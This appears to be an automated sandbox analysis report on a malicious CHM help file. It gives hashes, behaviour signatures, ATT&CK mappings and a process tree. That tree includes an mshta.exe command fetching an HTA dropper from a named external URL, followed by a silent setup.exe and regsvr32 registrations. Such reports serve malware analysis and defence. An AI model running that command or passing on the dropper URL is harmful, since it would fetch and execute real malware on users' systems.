Analysis

  • max time kernel
    142s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-03-2023 23:32

General

  • Target

    Message.chm

  • Size

    32KB

  • MD5

    0bf993c36aac528135749ec494f96e96

  • SHA1

    2082df9f3c58fc1c5fc285c07f25e93e30665a74

  • SHA256

    1830b84698851535c1029d10190e5d5518f90472102918a336222e9e9c7dba1b

  • SHA512

    ffac9634e01a2b74131780500c40881ed5092c87194296bbe6e579e8cab50ca663086a7fd66b5a6a4f1de6053d22068d485b78e0382ec893e3c4c983ff8a58ec

  • SSDEEP

    768:BQJWnBJ1mYvGnYULEgbSF82B46DzDoEP4IiZx:BQJWnHGY8uZNzDoFIE

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://attiferstudio.com/install.bak/sony/4.html

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 6 IoCs
  • Drops file in Windows directory 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\Message.chm
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3000
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/4.html ,
      2⤵
      • Blocklisted process makes network request
      PID:4076
    • C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\setup.exe
      C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\setup.exe /SILENT
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Users\Admin\AppData\Local\Temp\is-N3005.tmp\setup.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-N3005.tmp\setup.tmp" /SL5="$B004A,232352,54272,C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\setup.exe" /SILENT
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:5060
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\jmi\jxcommon\JxVistaDll.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:4972
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\JMI\JXMailOCX\JXMailViewerOCX.ocx"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:2088

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Program Files (x86)\JMI\JXMailOCX\JXMailViewerOCX.ocx
    Filesize

    592KB

    MD5

    76bb69b34320f8e6cdbfc579ec82a686

    SHA1

    74451ca0b37a1091c9bc0de032c18f5ccb766a78

    SHA256

    db9595cc365b389d0a78fbbc3a1710afc5271b3c829a92d312d0c3acf235e135

    SHA512

    042e234ad03af3a308f73d3a6600913118f2cf33da0ce1b1ea9db3a938baafb971649e57044b446926d7a0b3a38d78dd6783014cfb343155b63733633c644d77

  • C:\Program Files (x86)\JMI\JXMailOCX\JXMailViewerOCX.ocx
    Filesize

    592KB

    MD5

    76bb69b34320f8e6cdbfc579ec82a686

    SHA1

    74451ca0b37a1091c9bc0de032c18f5ccb766a78

    SHA256

    db9595cc365b389d0a78fbbc3a1710afc5271b3c829a92d312d0c3acf235e135

    SHA512

    042e234ad03af3a308f73d3a6600913118f2cf33da0ce1b1ea9db3a938baafb971649e57044b446926d7a0b3a38d78dd6783014cfb343155b63733633c644d77

  • C:\Program Files (x86)\JMI\jxcommon\JxVistaDll.dll
    Filesize

    88KB

    MD5

    6161c9cac29f98219bd7a118f9accea6

    SHA1

    8aa08500af2d8c9dc8b1e1a9363ac39e03aeb533

    SHA256

    cf5a0feb0ae47324252d279899ebca3cd8b82f1e5c02397f06946d342ff25160

    SHA512

    7b9967ef3075a9268886ccfef00edaa72d908cd7f74b715761de2811968d52ca731ba98e3e0b59aacb27eedd1ff271a422fb558d7713f02caa9445ac79ce5e32

  • C:\Program Files (x86)\JMI\jxcommon\JxZipDll.dll
    Filesize

    76KB

    MD5

    9e37ddec8c44266c4242c4ea0e9e1961

    SHA1

    5a920e96c9ab3e85ebe24c60cc54035ccc6c60e5

    SHA256

    39454653f32c20f386a800ed8c0eaea45fbd81df11562f14390eb5dec89c287e

    SHA512

    b4132d3d75de81f1dfcf62b154b42955bd558fcf47c06c96dddc806bc1d810bfb3d1ef60d7a574942f616692554dc2c551ddc19ca1af8838d3f9acde949944db

  • C:\Program Files (x86)\JMI\jxcommon\JxZipDll.dll
    Filesize

    76KB

    MD5

    9e37ddec8c44266c4242c4ea0e9e1961

    SHA1

    5a920e96c9ab3e85ebe24c60cc54035ccc6c60e5

    SHA256

    39454653f32c20f386a800ed8c0eaea45fbd81df11562f14390eb5dec89c287e

    SHA512

    b4132d3d75de81f1dfcf62b154b42955bd558fcf47c06c96dddc806bc1d810bfb3d1ef60d7a574942f616692554dc2c551ddc19ca1af8838d3f9acde949944db

  • C:\Program Files (x86)\jmi\jxcommon\JxVistaDll.dll
    Filesize

    88KB

    MD5

    6161c9cac29f98219bd7a118f9accea6

    SHA1

    8aa08500af2d8c9dc8b1e1a9363ac39e03aeb533

    SHA256

    cf5a0feb0ae47324252d279899ebca3cd8b82f1e5c02397f06946d342ff25160

    SHA512

    7b9967ef3075a9268886ccfef00edaa72d908cd7f74b715761de2811968d52ca731ba98e3e0b59aacb27eedd1ff271a422fb558d7713f02caa9445ac79ce5e32

  • C:\Program Files (x86)\jmi\jxcommon\JxZipDll.dll
    Filesize

    76KB

    MD5

    9e37ddec8c44266c4242c4ea0e9e1961

    SHA1

    5a920e96c9ab3e85ebe24c60cc54035ccc6c60e5

    SHA256

    39454653f32c20f386a800ed8c0eaea45fbd81df11562f14390eb5dec89c287e

    SHA512

    b4132d3d75de81f1dfcf62b154b42955bd558fcf47c06c96dddc806bc1d810bfb3d1ef60d7a574942f616692554dc2c551ddc19ca1af8838d3f9acde949944db

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\4HAJQ22Y\soft25_2[1].cab
    Filesize

    447KB

    MD5

    a227025dc3fd7fd3f02bbcc55a40687e

    SHA1

    756b6c85df46f3f09fc5ae3160f54c99aa958e14

    SHA256

    29bf42a256638e8fede712e4aa7caa980e1cf40790bd2698ab6ef1a87d2387ca

    SHA512

    be655cfd9a08ee9c9f329e3e279fa33a8e090e5dfdbf6d25ef7afbee7e620953e545b5da72a8db9beefd88b69f9d4d72db7bef5f8c039617df85f3c5edecf0e6

  • C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\JXmail25.inf
    Filesize

    148B

    MD5

    4c88264dca9aca63660a77dd7db9c8b7

    SHA1

    6dcb6b9e22d3bd92cc1c72fddb58e8e65d0884eb

    SHA256

    1b6e64adffde1e9ae08556eabafafda7a1a32dc5bc852fc40fcd3306e733a776

    SHA512

    08ff951203a83076caa3de8817b8e33e7724d0c9c429836a34fbc2e6f92615d03b4dd7d9213af98571fd2485c73743cd9ca6e975f8516874faea572164a174f5

  • C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\setup.exe
    Filesize

    463KB

    MD5

    374c3653388f264cff1df0bdf3b86f7d

    SHA1

    dcd924874c0d7b00bfbccc1e578890528641b1af

    SHA256

    0308b61c51db0f4a037a0ea320a9a7512ef5ef62c7a2dd5b54786714308e8966

    SHA512

    22281ce99732c4b299aacbfe30739a59f62fabdd61181e686867230fbf50bac90b17c012608e190fe6c0569b17d7c2b56149434cb99906c28ba587966101e0f4

  • C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\setup.exe
    Filesize

    463KB

    MD5

    374c3653388f264cff1df0bdf3b86f7d

    SHA1

    dcd924874c0d7b00bfbccc1e578890528641b1af

    SHA256

    0308b61c51db0f4a037a0ea320a9a7512ef5ef62c7a2dd5b54786714308e8966

    SHA512

    22281ce99732c4b299aacbfe30739a59f62fabdd61181e686867230fbf50bac90b17c012608e190fe6c0569b17d7c2b56149434cb99906c28ba587966101e0f4

  • C:\Users\Admin\AppData\Local\Temp\is-N3005.tmp\setup.tmp
    Filesize

    688KB

    MD5

    c765336f0dcf4efdcc2101eed67cd30c

    SHA1

    fa0279f59738c5aa3b6b20106e109ccd77f895a7

    SHA256

    c5177fdc6031728e10141745cd69edbc91c92d14411a2dec6e8e8caa4f74ab28

    SHA512

    06a67ac37c20897967e2cad453793a6ef1c7804d4c578404f845daa88c859b15b0acb51642e6ad23ca6ba6549b02d5f6c98b1fa402004bdbf9d646abab7ec891

  • C:\Users\Admin\AppData\Local\Temp\is-N3005.tmp\setup.tmp
    Filesize

    688KB

    MD5

    c765336f0dcf4efdcc2101eed67cd30c

    SHA1

    fa0279f59738c5aa3b6b20106e109ccd77f895a7

    SHA256

    c5177fdc6031728e10141745cd69edbc91c92d14411a2dec6e8e8caa4f74ab28

    SHA512

    06a67ac37c20897967e2cad453793a6ef1c7804d4c578404f845daa88c859b15b0acb51642e6ad23ca6ba6549b02d5f6c98b1fa402004bdbf9d646abab7ec891

  • memory/1484-172-0x0000000000400000-0x0000000000414000-memory.dmp
    Filesize

    80KB

  • memory/1484-205-0x0000000000400000-0x0000000000414000-memory.dmp
    Filesize

    80KB

  • memory/4972-197-0x0000000000DB0000-0x0000000000DC4000-memory.dmp
    Filesize

    80KB

  • memory/5060-183-0x0000000000650000-0x0000000000651000-memory.dmp
    Filesize

    4KB

  • memory/5060-204-0x0000000000400000-0x00000000004BC000-memory.dmp
    Filesize

    752KB